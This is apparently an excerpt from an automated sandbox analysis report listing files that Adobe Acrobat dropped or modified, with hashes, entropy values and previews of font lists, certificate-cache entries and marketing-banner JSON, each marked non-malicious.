                    SHA1:5F2691222F92C88073B3098AF12A0000086C59C0
                    SHA-256:F09D4FD80DC9E00C206AE0630D3B37EA28895DB120E2F8E5A7A059F0EDF6C9A6
                    SHA-512:C77E952DAD5948DC739B332876016BD0F29A2EA280B1B0F91EC83B9F94A137C645BA075FC6475872B8B381A06C05F76F67821D08027139EC1F8AAD0174432BA0
                    Malicious:false
                    Preview:p...... .........W2..,..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:modified
                    Size (bytes):328
                    Entropy (8bit):3.108350733067205
                    Encrypted:false
                    SSDEEP:6:kKF7R9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:pADnLNkPlE99SNxAhUe/3
                    MD5:5937ACEAEB10A9BB8A8030E09E91A20A
                    SHA1:1C5DE420204D7FAECAC2AF47CCD2380DD7FA9864
                    SHA-256:A4836D084D07F9DC7B1DE94CB3DD92DE7B12CA253620A677A123525AC3EFCACF
                    SHA-512:93704CF795C5186342A6A3800B2A98156ACA95ED401F8C9602EF8596C7DD82A92658D999DAC93E6A70C224EDA0F95399B836A05EABB3EB27D4D3F0DD08C23523
                    Malicious:false
                    Preview:p...... ........W.../,..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PostScript document text
                    Category:dropped
                    Size (bytes):185099
                    Entropy (8bit):5.182478651346149
                    Encrypted:false
                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                    Malicious:false
                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PostScript document text
                    Category:dropped
                    Size (bytes):185099
                    Entropy (8bit):5.182478651346149
                    Encrypted:false
                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                    Malicious:false
                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):295
                    Entropy (8bit):5.357872911738681
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXt1U6VoZcg1vRcR0YnYUoAvJM3g98kUwPeUkwRe9:YvXKXtCZc0v7nGMbLUkee9
                    MD5:E7ED8DA4B2508B0E9596BD46060CC539
                    SHA1:9CEB33533543F84A2FE99C57E44F63D27A2375D9
                    SHA-256:5E27976A3955BF692BEEF54BD948583CC8776CA285B83AD00DA82F300DFC4C59
                    SHA-512:FD7C7EAC2B0A584627A1C9ADAA7E6D4CD78B75EDFFDC6BDECF6BA2C4B60DD0BD77749C48D918D53358A9EBD6BFC6EE64C7D59C98D2CAD05C28DFE645B1E87C86
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.308946899321782
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXt1U6VoZcg1vRcR0YnYUoAvJfBoTfXpnrPeUkwRe9:YvXKXtCZc0v7nGWTfXcUkee9
                    MD5:B532BE17EE737F6FB1485CBDCE8521E3
                    SHA1:87715CE97B25819269E3214F3EFA40C1AFB395C6
                    SHA-256:8E0C99425616A443EF82B8F0348B9EF5096B99C5779072B3907435EE049DE271
                    SHA-512:51C55ADA6D1918A9926580100686436D65ECB60357953E9F1458E03981C289107EEA9DFF3C27F581603CC2F829E4A414CE864604A969CC663D087D411C6DD9BC
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.287941934716858
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXt1U6VoZcg1vRcR0YnYUoAvJfBD2G6UpnrPeUkwRe9:YvXKXtCZc0v7nGR22cUkee9
                    MD5:C3FE21C88BAD004052AD27F3E698FF5C
                    SHA1:4884057901095BE798E0EAA0CF52612AD0823914
                    SHA-256:CA7C949E52D1045279605988CD94C7BCA6EFC9A4D58AF18823FB58AB2CA5F624
                    SHA-512:68F7C92616549AB76258B959E3B5036AF3167F4AEC3DC77BD15273087CF4B5A9DA058231A03B39D5C8915C8FEF42EF1B2747F9BE3A494461FC0E628D541D57BD
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):285
                    Entropy (8bit):5.344690769703016
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXt1U6VoZcg1vRcR0YnYUoAvJfPmwrPeUkwRe9:YvXKXtCZc0v7nGH56Ukee9
                    MD5:CF00886D8F1F5B109F3F7DDD9AEDF03F
                    SHA1:DE048D85971C7F32A1BCEC9E9C8239178D163FFF
                    SHA-256:BE0DB7183689C5B5763003E4B053307B8848502606360D7F238B239B48E4DC5E
                    SHA-512:A355163E885E9605D9BFF5B144B152E862D8D1E53D4C968F7CB76082F7F09DBB9D7136BAECE16AD5F9AF2B2F74375B775D9CC547517C779E9A32EA989420029C
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):1123
                    Entropy (8bit):5.689648406179917
                    Encrypted:false
                    SSDEEP:24:Yv6XtCzv7spLgE9cQx8LennAvzBvkn0RCmK8czOCCSr:Yv3Tshgy6SAFv5Ah8cv/r
                    MD5:8F91F8C5399715DE64A7B93DAB1C7952
                    SHA1:016985E1433DB7EDE7F269467B52155888954C98
                    SHA-256:98C55F5AC228732B7943AB337A485F299C12D684CE018CB48D4AC7CEFC660726
                    SHA-512:1FB2474E0DBB8EF96125008ADC49D23433E56B0BD96E676BE6E6BEB8343386BAC1D3ECF2794C1180D526A2566EE5565E657A6AE9C85352DFB38B4DD6D94CC82C
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):1122
                    Entropy (8bit):5.684037417071524
                    Encrypted:false
                    SSDEEP:24:Yv6XtCzv7GVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBi:Yv3TGFgSNycJUAh8cvYHp
                    MD5:248DDC4D62D2B815FE7DDCCFDD5E0E39
                    SHA1:8C39E0DADDE26C4CCFBEFD6DD4DAA8B7E1DAC35F
                    SHA-256:D59B6871C75D74253808FC604EBF0CDEF2857F97197C903122D9F855A787DBC3
                    SHA-512:42DBA92EAA779C9F2FEBFDDEC1F4122A7A5A22FDC84D33ED550E9BCD608583B05D43D0299419ED4446C147AF413DE80230C883DB08EDC641D27507CD625841C1
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):5.295949155000267
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXt1U6VoZcg1vRcR0YnYUoAvJfQ1rPeUkwRe9:YvXKXtCZc0v7nGY16Ukee9
                    MD5:0783EC94CC5C1E021F98B96E16CDA4B7
                    SHA1:EB389DDDF34D581412B7CF5A2FE5B470E84BCBE5
                    SHA-256:4CAC4A1C7538C4101CE23FBAB0CFAB10291BD2176397B41FABB2DE55BE6126D2
                    SHA-512:0F8972BD38022D99211FB2A9491704744A1A81C0A17BBA7A31937FFF3C17A9FC7DE8A5E6901CA86E470114F6E3B96A93394393CEE0E746DBBF6CFE0F13186F52
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):1102
                    Entropy (8bit):5.6747229239075425
                    Encrypted:false
                    SSDEEP:24:Yv6XtCzv7z2LgErcXWl7y0nAvzIBcSJCBViVi:Yv3TzogH47yfkB5kVr
                    MD5:48AEF0BC9C65490EBCAEE8AFF5B77B14
                    SHA1:A29477771DE95E9427B2699B64E0A94592B0910C
                    SHA-256:C42963339C858E6E9EF2C19364F82305E688633DAE6CDD3EB7C0E2005A1E05B5
                    SHA-512:666838DC78A5004359CE6B610003648936FF3558E0BCD2E65D39234A1EDBA889098AF259F876C0C8315D9590AC4012BA3174EEEB9C87EE9AE449FFD81E0081EF
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):1164
                    Entropy (8bit):5.698911377245408
                    Encrypted:false
                    SSDEEP:24:Yv6XtCzv7/KLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5i:Yv3T/EgqprtrS5OZjSlwTmAfSK4
                    MD5:D7BB1775A40E1FA3F79EB70AF23DE4BE
                    SHA1:2F098717898BE53A19CB174C30D6B151FFDF2770
                    SHA-256:16F1CD02E2812E1F253E6A511A83EFB0D3F9D4E47EDC5FF00A170736F648E2DF
                    SHA-512:A31656826DE8261E85C75839E3DAFB1508E9E15422F1031E5FEA20E88E5D5323722040E0A55E64110174674E88AAC14155B09F78248B822269651CF23A086779
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.297462803067911
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXt1U6VoZcg1vRcR0YnYUoAvJfYdPeUkwRe9:YvXKXtCZc0v7nGg8Ukee9
                    MD5:6362A2790351A3CCA41E7942014DAFBA
                    SHA1:A5FFCA3AE076B343050FE6FB384D2A6C1B44EAC3
                    SHA-256:DC48B6926F595BB0ED7DCDACB47D57BDB461C41FF89F0AF06ECD5F397C8B3ADF
                    SHA-512:59D8CF88A91F6BD363068FF91F856BE302852D137FDC1D34F98970DF2752A170DDE27DA889A0DBDF20F57CFEFEA85BA8E806366C2B16D6957C0F846E162FFCB6
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):1395
                    Entropy (8bit):5.777774357268216
                    Encrypted:false
                    SSDEEP:24:Yv6XtCzv7CrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJN6:Yv3TCHgDv3W2aYQfgB5OUupHrQ9FJ4
                    MD5:CF037D78F95022001B10AAC13E77AEE7
                    SHA1:F4346026A8F0FD394E321C73975DA6AC0A9CF134
                    SHA-256:81C4CAE9923B7FBCD645C979F5B5DEA4CF2DC1CB7F1FFE262A636A8F81515540
                    SHA-512:04762B063525BCAFE8BE5A16506A40DD7518EE142CBC2F6D688B806B74E1EBFD1C7F9D37A9FA8EC58F2AC3973E89806FB5CB06AAB7945110376381A6B0711378
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):291
                    Entropy (8bit):5.281027338521376
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXt1U6VoZcg1vRcR0YnYUoAvJfbPtdPeUkwRe9:YvXKXtCZc0v7nGDV8Ukee9
                    MD5:20E5B3F3A7CF894C79D4114F172D9581
                    SHA1:188B2D03EC8A243D20FADFF51C9D1FC265E4CEAE
                    SHA-256:CB778BF2A6D5D76AD1826EFB6F31C384904A6672E36DE7C9CC042176BC2BE9D9
                    SHA-512:E6C63C03CD2CB4A636DE90AB0553102C6EE3C054ED9254869DDA2257A90F4CDF54E117E768EFD91F290CDE6165A0ED4BB0B2C6EB6FFCE76F7D27F58B75B07809
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):287
                    Entropy (8bit):5.285939538150076
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXt1U6VoZcg1vRcR0YnYUoAvJf21rPeUkwRe9:YvXKXtCZc0v7nG+16Ukee9
                    MD5:94B9C3136D43193264B25220B0ED45F8
                    SHA1:79D2911C2FD19B10ECB4EBBFEECE216767D38294
                    SHA-256:FEAC36CC63C0868FBD56BFA1C7D60BF5F71A65256173B8BFA55A0645D260252F
                    SHA-512:CA6F1906BA4F27475DA240A8D64746DA64E4FD45882B6C9C58BC83D24F246B4B79E895A11C9957BBBC8CA809CA9FADBD281EE69BD7D4BA1E2DC8E254EA36DBFE
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):1090
                    Entropy (8bit):5.664789172960202
                    Encrypted:false
                    SSDEEP:24:Yv6XtCzv7YamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSr:Yv3TeBgkDMUJUAh8cvMr
                    MD5:22502B66A394C73F41062393B1D77BD7
                    SHA1:1E6240DDC3C45CD01D1DFDC4790DEFD09D707876
                    SHA-256:29DB70A7EF07B47EF0640DF802E4CDE857F3828AA1AF4C4435CC0BD9864BE4C7
                    SHA-512:A714128FA5E719914DE77D2B3F9BF7BD80E1E80086A916F42369A8B072635E6ACE3B2DBB23355C8B2C9E1AA7E4D542B911D4005CA6E873970DEE2F0B813E7C91
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):286
                    Entropy (8bit):5.262291798885299
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXt1U6VoZcg1vRcR0YnYUoAvJfshHHrPeUkwRe9:YvXKXtCZc0v7nGUUUkee9
                    MD5:B16F466D128F52B5F1C8AC76C3671FFB
                    SHA1:0A20D1F32A583EB28F893979434B464A1C79A929
                    SHA-256:F2CB97E046E84A25004AD3CA979EC596615105C18563E1167D44F021624928F7
                    SHA-512:BAFE4E9185D479F274234C93A39CCBB59D16731CB4320B024EBF4CBAEE636099CA5E3FBB77DD45D7BC076ADA915F0FB25A7E7204732F401D14B845164D9FFB61
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):782
                    Entropy (8bit):5.366183431266471
                    Encrypted:false
